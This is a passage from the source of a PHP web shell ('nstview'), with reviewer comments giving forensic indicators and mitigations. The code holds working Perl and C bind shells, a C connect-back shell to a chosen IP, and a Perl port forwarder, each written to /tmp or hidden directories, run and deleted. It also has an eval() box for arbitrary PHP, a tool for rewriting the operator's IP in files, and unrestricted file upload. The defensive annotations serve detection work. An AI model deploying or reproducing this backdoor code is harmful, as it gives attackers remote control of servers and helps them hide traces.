1266 if($ff != "." && $ff != ".."){
1267 if(@is_dir("$dir/$ff")){
1268 deldir("$dir/$ff");
1269 }else{
1270 @unlink("$dir/$ff");
1271 }}}
1272 @closedir($handle);
1273 if(@rmdir($dir)){
1274 @$success = true;}
1275 return @$success;
1276 }
1277 $dir=@$dir;
     # The return value is discarded; the page redirects regardless of the outcome.
1278 deldir($dir);
1279 
     # Rebuild the parent path from rback by dropping its last "/"-separated component,
     # then redirect the browser there immediately.
1280 $rback=$_GET['rback'];
1281 @$rback=explode("/",$rback);
1282 $crb=count($rback);
1283 for($i=0; $i<$crb-1; $i++){
1284         @$x.=$rback[$i]."/";
1285 }
1286 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
1287 echo $copyr;
1288 exit;}
1289 
1290 
1291 if(@$_GET['t']=="tools"){
1292         # unix
1293 if($os=="unix"){
1294 print "
1295 <center><br>
1296 <font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
1297 <table border=1>
1298 <tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
1299 <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
1300 <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
1301 <tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
1302 <tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
1303 <tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
1304 <tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
1305 </table>
1306 </center>
1307 <br><Br>
1308 ";
1309 }#end of unix
1310 
1311 
1312 if($_POST['perl_bd']){
1313 $port=$_POST['port'];
1314 $perl_bd_scp = "
1315 use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
1316 setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
1317 listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
1318 open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
1319 close X;}}";
1320 
1321 if(is_writable("/tmp")){
     # Drop-run-delete stage for the Perl listener held in $perl_bd_scp: the script is
     # written to /tmp/nst_perl_bd.pl, started in the background with nohup, and the
     # file is unlinked straight away. If /tmp is not writable the same steps run in a
     # hidden directory .nst_bd_tmp under the current directory, which is then removed.
     # NOTE(review, forensics): because the file is deleted right after launch, the
     # evidence is in the process table rather than on disk - a perl process owned by
     # the web server account whose script path no longer exists, holding a listening
     # TCP socket. The fixed names nst_perl_bd.pl and .nst_bd_tmp are usable as
     # indicators in file-creation and process-execution telemetry.
1322 $fp=fopen("/tmp/nst_perl_bd.pl","w");
1323 fwrite($fp,"$perl_bd_scp");
1324 passthru("nohup perl /tmp/nst_perl_bd.pl &");
1325 unlink("/tmp/nst_perl_bd.pl");
1326 }else{
1327 if(is_writable(".")){
1328 mkdir(".nst_bd_tmp");
1329 $fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
1330 fwrite($fp,"$perl_bd_scp");
1331 passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
1332 unlink(".nst_bd_tmp/nst_perl_bd.pl");
1333 rmdir(".nst_bd_tmp");
1334 }
1335 }
1336 $show_ps="1";
1337 }#end of start perl_bd
1338 
1339 if($_POST['perl_proxy']){
     # "Web proxy" launcher. In this listing the payload variable is an empty string,
     # so base64_decode() yields nothing and the file written below is empty; the
     # original presumably carried a base64-encoded Perl script here - not recoverable
     # from this page.
1340 $port=$_POST['port'];
1341 $perl_proxy_scp = "";
1342 
     # Same drop-run-delete pattern as the other tools: write to /tmp (or to a hidden
     # .nst_proxy_tmp directory), start with nohup in the background, unlink at once.
     # The POSTed port is placed on the shell command line without escaping.
     # NOTE(review, forensics): indicator names are nst_perl_proxy.pl and
     # .nst_proxy_tmp; the perl child runs as the web server account.
1343 if(is_writable("/tmp")){
1344 $fp=fopen("/tmp/nst_perl_proxy.pl","w");
1345 fwrite($fp,base64_decode($perl_proxy_scp));
1346 passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
1347 unlink("/tmp/nst_perl_proxy.pl");
1348 }else{
1349 if(is_writable(".")){
1350 mkdir(".nst_proxy_tmp");
1351 $fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
1352 fwrite($fp,base64_decode($perl_proxy_scp));
1353 passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
1354 unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
1355 rmdir(".nst_proxy_tmp");
1356 }
1357 }
     # Triggers the "ps ux" listing printed later on the tools page.
1358 $show_ps="1";
1359 }#end of start perl_proxy
1360 
1361 if($_POST['c_bd']){
1362 $port=$_POST['port'];
1363 $c_bd_scp = "#define PORT $port
1364 #include <stdio.h>
1365 #include <signal.h>
1366 #include <sys/types.h>
1367 #include <sys/socket.h>
1368 #include <netinet/in.h>
1369 
1370 int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
1371 struct sockaddr_in serv_addr;
1372 struct sockaddr_in client_addr;
1373 
1374 int main ()
1375 {
1376     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
1377     if (soc_des == -1)
1378         exit(-1);
1379     bzero((char *) &serv_addr, sizeof(serv_addr));
1380     serv_addr.sin_family = AF_INET;
1381     serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
1382     serv_addr.sin_port = htons(PORT);
1383     soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
1384     if (soc_rc != 0)
1385         exit(-1);
1386     if (fork() != 0)
1387         exit(0);
1388     setpgrp();
1389     signal(SIGHUP, SIG_IGN);
1390     if (fork() != 0)
1391         exit(0);
1392     soc_rc = listen(soc_des, 5);
1393     if (soc_rc != 0)
1394         exit(0);
1395     while (1) {
1396         soc_len = sizeof(client_addr);
1397         soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
1398         if (soc_cli < 0)
1399             exit(0);
1400         cli_pid = getpid();
1401         server_pid = fork();
1402         if (server_pid != 0) {
1403             dup2(soc_cli,0);
1404             dup2(soc_cli,1);
1405             dup2(soc_cli,2);
1406             execl(\"/bin/sh\",\"sh\",(char *)0);
1407             close(soc_cli);
1408             exit(0);
1409         }
1410     close(soc_cli);
1411     }
1412 }
1413 
1414 ";
1415 
1416 
1417 if(is_writable("/tmp")){
     # Drop-compile-run-delete stage for the C listener held in $c_bd_scp: the source
     # is written to /tmp/nst_c_bd.c, compiled on the host with gcc into /tmp/nst_bd,
     # started in the background with nohup, and both files are unlinked. The fallback
     # branch does the same inside a hidden .nst_bd_tmp directory.
     # NOTE(review, detection): a compiler being invoked by the web server account is
     # itself a strong signal, and removing gcc from web hosts makes this path fail.
     # After the unlinks the running binary has no file on disk; look for a process
     # with a deleted executable and a listening socket. Indicator names: nst_c_bd.c,
     # nst_bd, .nst_bd_tmp.
1418 $fp=fopen("/tmp/nst_c_bd.c","w");
1419 fwrite($fp,"$c_bd_scp");
1420 passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
1421 passthru("nohup /tmp/nst_bd &");
1422 unlink("/tmp/nst_c_bd.c");
1423 unlink("/tmp/nst_bd");
1424 }else{
1425 if(is_writable(".")){
1426 mkdir(".nst_bd_tmp");
1427 $fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
1428 fwrite($fp,"$c_bd_scp");
1429 passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
1430 passthru("nohup .nst_bd_tmp/nst_bd &");
1431 unlink(".nst_bd_tmp/nst_bd");
1432 unlink(".nst_bd_tmp/nst_c_bd.c");
1433 rmdir(".nst_bd_tmp");
1434 }
1435 }
1436 $show_ps="1";
1437 }#end of c bd
1438 
1439 
1440 if($_POST['bc_c']){ # nc -l -p 4500
1441 $port_c = $_POST['port_c'];
1442 $ip=$_POST['ip'];
1443 $bc_c_scp = "#include <stdio.h>
1444 #include <sys/types.h>
1445 #include <sys/socket.h>
1446 #include <unistd.h>
1447 #include <fcntl.h>
1448 
1449 #include <netinet/in.h>
1450 #include <netdb.h>
1451 
1452 int fd, sock;
1453 int port = $port_c;
1454 struct sockaddr_in addr;
1455 
1456 char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
1457 char shell[] = \"/bin/sh\";
1458 
1459 int main(int argc, char *argv[]) {
1460         while(argc<2) {
1461         fprintf(stderr, \" %s <ip> \", argv[0]);
1462         exit(0); }
1463 
1464 addr.sin_family = AF_INET;
1465 addr.sin_port = htons(port);
1466 addr.sin_addr.s_addr = inet_addr(argv[1]);
1467 fd = socket(AF_INET, SOCK_STREAM, 0);
1468 connect(fd, (struct sockaddr*)&addr, sizeof(addr));
1469 
1470 send(fd, mesg, sizeof(mesg), 0);
1471 
1472 dup2(fd, 0);
1473 dup2(fd, 1);
1474 dup2(fd, 2);
1475 execl(shell, \"in.telnetd\", 0);
1476 
1477 close(fd);
1478 return 1;
1479 }
1480 
1481 ";
1482 
1483 if(is_writable("/tmp")){
     # Drop-compile-run-delete stage for the connect-back program held in $bc_c_scp.
     # The POSTed $ip is placed on the shell command line without escaping.
     # NOTE(review, forensics): the clean-up here does not match the names used for
     # writing, which leaves artifacts behind:
     #  - the source is written to /tmp/nst_c_bc_c.c, but the unlink at the end targets
     #    /tmp/nst_bc_c.c, so the C source stays in /tmp;
     #  - both pre-checks test for nst_c_bc_c.c, and the second one unlinks
     #    /tmp/nst_c_bc, a name nothing else in this block creates;
     #  - in the fallback branch the written file is .nst_bc_c_tmp/nst_c_bc_c.c while
     #    the unlink targets .nst_bc_c_tmp/nst_bc_c.c, so the directory is presumably
     #    not empty when rmdir() runs and would remain together with the source.
     # The str_replace() lines act on $bd_c_scp, which is not the variable written to
     # disk ($bc_c_scp), so they do not affect the file content.
     # NOTE(review, detection): gcc started by the web server account, followed by an
     # outbound TCP connection from a process with a deleted executable.
1484 if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
1485 if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
1486 $fp=fopen("/tmp/nst_c_bc_c.c","w");
1487 $bd_c_scp=str_replace("!n","\n",$bd_c_scp);
1488 fwrite($fp,"$bc_c_scp");
1489 passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
1490 passthru("nohup /tmp/nst_bc_c $ip &");
1491 unlink("/tmp/nst_bc_c");
1492 unlink("/tmp/nst_bc_c.c");
1493 }else{
1494 if(is_writable(".")){
1495 mkdir(".nst_bc_c_tmp");
1496 $fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
1497 $bd_c_scp=str_replace("!n","\n",$bd_c_scp);
1498 fwrite($fp,"$bc_c_scp");
1499 passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
1500 passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
1501 unlink(".nst_bc_c_tmp/nst_bc_c.c");
1502 unlink(".nst_bc_c_tmp/nst_bc_c");
1503 rmdir(".nst_bc_c_tmp");
1504 }
1505 }
1506 $show_ps="1";
1507 
1508 }#end of back connect C
1509 
1510 
1511 if($_POST['datapipe_pl']){
1512 $port_2=$_POST['port_2'];
1513 $port_3=$_POST['port_3'];
1514 $ip=$_POST['ip'];
1515 $datapipe_pl = "
1516 #!/usr/bin/perl
1517 # coded by CuTTer (rus hacker)
1518 use IO::Socket;
1519 use POSIX;
1520 
1521 \$localport=$port_2;
1522 \$host=\"$ip\";
1523 \$port=$port_3;
1524 
1525 \$daemon=1;
1526 
1527 \$DIR = undef;
1528 
1529 
1530 ### Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
1531 \$log=0;
1532 
1533 
1534 
1535 
1536 \$| = 1;
1537 
1538 if (\$daemon){
1539         print \"3anycKaeM daemon\n\";
1540 
1541         \$pid = fork;
1542         exit if \$pid;
1543         die \"Couldn't fork: \$!\" unless defined(\$pid);
1544         POSIX::setsid() or die \"Can't start a new session: \$!\";
1545 }
1546 
1547 %o = ('port' => \$localport,
1548           'toport' => \$port,
1549           'tohost' => \$host);
1550 
1551 \$ah = IO::Socket::INET->new(
1552                          'LocalPort' => \$localport,
1553                          'Reuse' => 1,
1554                          'Listen' => 10)
1555     || die \"Íåëüçÿ îòêðûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
1556 
1557 print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
1558 \$SIG{'CHLD'} = 'IGNORE';
1559 \$num = 0;
1560 while (1) {
1561         \$ch = \$ah->accept();
1562         if (!\$ch) {
1563                 print STDERR \"Ïðåðâàíî âûïîëåíèå accept: \$!\n\";
1564                 next;
1565         }
1566 
1567         printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
1568         \$ch->peerhost(), \$ch->peerport()) if \$log;
1569         ++\$num;
1570         \$pid = fork();
1571         if (!defined(\$pid)) {
1572                 print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
1573     } elsif (\$pid == 0) {
1574 
1575 ### Íîâûé ïðîöåññ
1576                 \$ah->close();
1577                 Run(\%o, \$ch, \$num);
1578         } else {
1579                 print \"Parent: Fork ïðîøåë óñïåøíî, çàêðûâàåì ñîêåò.\n\" if \$log;
1580                 \$ch->close();
1581         }
1582 }
1583 
1584 
1585 sub Run {
1586         my(\$o, \$ch, \$num) = @_;
1587         my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
1588                                                         'PeerPort' => \$o->{'toport'});
1589         print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log;
1590         if (!\$th) {
1591                 printf STDERR (\"Child: Ïðåðâàí ðåäèðåêò íà %s, ïîðò %s.\n\",
1592                 \$o->{'tohost'}, \$o->{'toport'});
1593                 exit 0;
1594         }
1595 
1596         my \$fh;
1597         if (\$o->{'dir'}) {
1598                 \$fh = Symbol::gensym();
1599                 open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
1600                 or die \"Child: Ïðåðâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
1601         }
1602 
1603         \$ch->autoflush();
1604         \$th->autoflush();
1605         while (\$ch || \$th) {
1606                 print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log;
1607                 my \$rin = \"\";
1608                 vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
1609                 vec(\$rin, fileno(\$th), 1) = 1 if \$th;
1610                 my(\$rout, \$eout);
1611                 select(\$rout = \$rin, undef, \$eout = \$rin, 120);
1612                 if (!\$rout  &&  !\$eout) {
1613                         print STDERR \"Child: Îøèáêà Timeout.\n\";
1614                 }
1615                 my \$cbuffer = \"\";
1616                 my \$tbuffer = \"\";
1617 
1618                 if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
1619                         print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
1620                         my \$result = sysread(\$ch, \$tbuffer, 1024);
1621                         if (!defined(\$result)) {
1622                                 print STDERR \"Child: Îøèáêà ïðè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
1623                                 exit 0;
1624                         }
1625                         if (\$result == 0) {
1626                                 print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
1627                                 exit 0;
1628                         }
1629 
1630                         print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
1631                 }
1632 
1633                 if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
1634                         print \"Child: Æäåì äàííûõ.\n\" if \$log;
1635                         my \$result = sysread(\$th, \$cbuffer, 1024);
1636                         if (!defined(\$result)) {
1637                                 print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
1638                                 exit 0;
1639                         }
1640 
1641                         if (\$result == 0) {
1642                                 print \"Child: Ïðîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
1643                                 exit 0;
1644                         }
1645 
1646                         print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
1647             }
1648 
1649                 if (\$fh  &&  \$tbuffer) {
1650                         (print \$fh \$tbuffer);
1651                 }
1652 
1653                 while (my \$len = length(\$tbuffer)) {
1654                         print \"Child: Îòïðàâëÿåì \$len áàéò.\n\" if \$log;
1655                         my \$res = syswrite(\$th, \$tbuffer, \$len);
1656                         print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log;
1657                         if (\$res > 0) {
1658                                 \$tbuffer = substr(\$tbuffer, \$res);
1659                         } else {
1660                                 print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
1661                         }
1662                 }
1663 
1664                 while (my \$len = length(\$cbuffer)) {
1665                         print \"Child: Îòïðàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
1666                         my \$res = syswrite(\$ch, \$cbuffer, \$len);
1667                         print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log;
1668                         if (\$res > 0) {
1669                                 \$cbuffer = substr(\$cbuffer, \$res);
1670                         } else {
1671                                 print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
1672                         }
1673                 }
1674         }
1675 }
1676 
1677 ";
1678 
1679 if(is_writable("/tmp")){
     # Drop-run-delete stage for the Perl port forwarder held in $datapipe_pl: written
     # to /tmp/nst_perl_datapipe.pl, started in the background with nohup, unlinked
     # immediately. The fallback branch uses a hidden .nst_datapipe_tmp directory.
     # NOTE(review, forensics): after the unlink only the process remains - a perl
     # process owned by the web server account with a listening socket and onward
     # connections to another host. Indicator names: nst_perl_datapipe.pl and
     # .nst_datapipe_tmp.
1680 $fp=fopen("/tmp/nst_perl_datapipe.pl","w");
1681 fwrite($fp,"$datapipe_pl");
1682 passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
1683 unlink("/tmp/nst_perl_datapipe.pl");
1684 }else{
1685 if(is_writable(".")){
1686 mkdir(".nst_datapipe_tmp");
1687 $fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
1688 fwrite($fp,"$datapipe_pl");
1689 passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
1690 unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
1691 rmdir(".nst_datapipe_tmp");
1692 }
1693 }
1694 $show_ps="1";
1695 
1696 }#end of datapipe perl
1697 
1698 
1699 
1700 
1701 
// Defender note: when $show_ps is "1" (it is set right after the datapipe launch
// earlier in the file) the page prints the output of `ps ux`, i.e. the process
// list of the account PHP runs as, inside a <pre> block.
// In process-creation telemetry this shows up as `ps` executed by the web-server
// user, which is unusual for a normal web application.
1702 if($show_ps=="1"){
1703 print "<center><b>1</b></center><br><br>";
1704 print "<pre>";
1705 passthru("ps ux");
1706 print "</pre><br><br>";
1707 }
1708 
1709 
1710 
// Convenience forms: each one hashes or encodes the posted text and prints the
// result in a textarea. Nothing in this stretch reads or writes files or runs
// commands; the results are echoed into the page without HTML escaping.
1711 echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
1712 <Br>
1713 md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
1714 </form>
1715 ";
// md5 field: prints md5() of the posted value (a hash is computed, nothing is "decoded").
1716 @$md5=@$_POST['md5'];
1717 if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
1718 echo "<br>
1719 <form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
// base64 field: prints both base64_encode() and base64_decode() of the same input.
1720 if(@$_POST['base64']){
1721 @$base64=$_POST['base64'];
1722 echo "
1723 <b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
1724 Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
1725 echo "<br>
1726 <form method=post><b>DES:</b><br><input name=des size=30><br>
1727 John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
// des field: crypt() is called without a salt, so the hash scheme actually produced
// depends on the PHP build; the "DES" label is not guaranteed by this code.
1728 if(@$_POST['des']){
1729 @$des=@$_POST['des'];
1730 echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
1731 
// Prints the form whose textarea is posted as the field "eval"; the handler that
// consumes that field follows further down in the file.
1732 print "
1733 <b>eval:</b<br>
1734 (example: print \"Hello World\";)
1735 <form method=post>
1736 <font color=red><b><?</b><br>
1737 <textarea name=eval rows=15 cols=113></textarea><br>
1738 <b>?></b></font><br>
1739 <input type=submit value=Run style='width:150px;'>
1740 </form><br>
1741 ";
1742 
// eval_sl($editf): returns $editf unchanged, except that when magic_quotes_gpc is
// enabled the backslashes PHP added to request data are stripped first, so the
// text matches what was typed into the form.
// Performs no validation or filtering of any kind.
1743 function eval_sl($editf){
1744 if(get_magic_quotes_gpc()==1){
1745 $editf=stripslashes($editf);
1746 }
1747 return $editf;
1748 }
1749 
1750 
// Defender note: this is the arbitrary-code-execution core of the page. The text
// posted as "eval" is passed to eval() and therefore runs as PHP with the
// privileges of the web-server account; afterwards the same text is echoed back,
// HTML-escaped, between "<?" and "?>" markers.
// Detection: POST requests carrying a field named "eval" to a script that is not
// part of the deployed application; POST bodies are usually absent from access
// logs, so body-aware inspection (WAF, application logging) is needed to see it.
// Mitigation: eval is a language construct, not a function, so disable_functions
// does not block it; prevention has to happen at the upload/write stage.
1751 if($_POST['eval']){
1752 print "<b>RESULT:<br><br></b>";
1753 eval(eval_sl($_POST['eval']));
1754 print "<br><br>";
1755 
1756 print "<font color=green><b>PHP:</b><br>\r\n\r\n";
1757 print "<?\r\n";
1758 print "<br>";
1759 print htmlspecialchars(eval_sl(($_POST['eval'])));
1760 print "<br>";
1761 print "?>\r\n\r\n</font><br><br>";
1762 
1763 }
1764 
1765 echo $copyr;
1766 exit;}
1767 
// Defender note: "replace" tool. With ?replace=1 it shows a search/replace form for
// the file "$d/$e" (both taken from the query string without any check) and, on
// POST, rewrites that file with every occurrence of one string replaced by another.
// The search field is pre-filled with the requester's own REMOTE_ADDR and the
// replacement with a fixed IP address; presumably this is meant for rewriting the
// operator's address in files such as logs, although the code works on any file
// the PHP account can write. (NOTE(review): intent inferred from the defaults.)
// Mitigation: logs that are shipped off-host or are not writable by the web-server
// account cannot be altered this way.
1768 if(@$_GET['replace']=="1"){
1769 $ip=@$_SERVER['REMOTE_ADDR'];
1770 $d=$_GET['d'];
1771 $e=$_GET['e'];
1772 @$de=$d."/".$e;
1773 $de=str_replace("//","/",$de);
1774 $e=@$e;
// Per-file action menu; the same link row is printed by the view and edit pages.
1775 echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
1776 echo "
1777 Replace tool:<br>
1778 (You can replace any text)<br>
1779 File: $de<br>
1780 <form method=post>
1781 1. Your ip.<br>
1782 2. microsoft.com ip :)<br>
1783 Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
1784 <input type=submit name=doit value=Replace>
1785 </form>
1786 ";
1787 
// POST handler: reads the whole file, runs str_replace() and writes the result back
// over the same path. All errors are suppressed with @ and neither handle is
// closed, so a failed read followed by a successful open-for-write would leave the
// file truncated.
1788 if(@$_POST['doit']){
1789 @$thisX=$_POST['thisX'];
1790 @$bythis=$_POST['bythis'];
1791 @$e=$_GET['e'];
1792 $filename="$d/$e";
1793 $fd = @fopen ($filename, "r");
1794 $rpl = @fread ($fd, @filesize ($filename));
1795 $re=str_replace("$thisX","$bythis",$rpl);
1796 $x=@fopen("$d/$e","w");
1797 @fwrite($x,"$re");
1798 echo "<br><center>$thisX Replaced by $bythis<br>
1799 [<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
1800 
1801 }
1802 echo $copyr;
1803 exit;}
1804 
1805 
// Defender note: single-file upload page (?t=upload). The destination directory
// ("where") and the file name ("newf", falling back to the client-supplied name)
// both come from the request, so the upload can be placed anywhere the PHP account
// can write, under any name and extension.
// Detection: multipart/form-data POSTs to this script, and new files appearing in
// web-served directories outside a deployment.
// Mitigation: file_uploads=Off where the application needs no uploads; writable
// directories that are not served as executable PHP.
1806 if(@$_GET['t']=="upload"){
1807 echo "<br>
1808 <a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
1809 File upload:<br>
1810 <form enctype=\"multipart/form-data\" method=post>
1811 <input type=file name=text size=50><br>
1812 <input name=where size=52 value='$d'><br>
1813 New file name:<br>
1814 <input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
1815 <input type=submit value=Upload name=uploadf>
1816 </form><br>
1817 ";
1818 
// POST handler: builds "$where/$newf" and moves the uploaded temp file there.
// The only normalisation is collapsing "//" to "/"; there is no path or type check.
1819 if(@$_POST['uploadf']){
1820 $where=$_POST['where'];
1821 $newf=$_POST['newf'];
1822 $where=str_replace("//","/",$where);
1823 if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
1824 $uploadfile = "$where/".$newf;
1825 if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
1826 $uploadfile=str_replace("//","/",$uploadfile);
1827 echo "<i><br>Uploaded to $uploadfile</i><br>";
1828 }else{
1829 echo "<i><br>Error</i><br>";}
1830 }
1831 }
1832 
// Defender note: bulk upload page (?t=massupload). Twenty file inputs named text1
// to text20 are posted together with one destination directory ("where"); each
// file keeps its client-supplied name. As with the single upload, neither the
// directory nor the names are validated.
// Detection: one multipart POST creating many files at once in a web-served
// directory is a strong file-integrity-monitoring signal.
1833 if(@$_GET['t']=="massupload"){
1834 echo "
1835 Mass upload:<br>
1836 <form enctype=\"multipart/form-data\" method=post>
1837 <input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
1838 <input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
1839 <input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
1840 <input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
1841 <input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
1842 <input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
1843 <input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
1844 <input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
1845 <input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
1846 <input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
1847 <input name=where size=43 value='$d'><br>
1848 <input type=submit value=Upload name=massupload>
1849 </form><br>";
1850 
// POST handler: the twenty destination paths are built first, then each temp file
// is moved in turn. Empty slots simply fail move_uploaded_file() silently (@).
1851 if(@$_POST['massupload']){
1852 $where=@$_POST['where'];
1853 $uploadfile1 = "$where/".@$_FILES['text1']['name'];
1854 $uploadfile2 = "$where/".@$_FILES['text2']['name'];
1855 $uploadfile3 = "$where/".@$_FILES['text3']['name'];
1856 $uploadfile4 = "$where/".@$_FILES['text4']['name'];
1857 $uploadfile5 = "$where/".@$_FILES['text5']['name'];
1858 $uploadfile6 = "$where/".@$_FILES['text6']['name'];
1859 $uploadfile7 = "$where/".@$_FILES['text7']['name'];
1860 $uploadfile8 = "$where/".@$_FILES['text8']['name'];
1861 $uploadfile9 = "$where/".@$_FILES['text9']['name'];
1862 $uploadfile10 = "$where/".@$_FILES['text10']['name'];
1863 $uploadfile11 = "$where/".@$_FILES['text11']['name'];
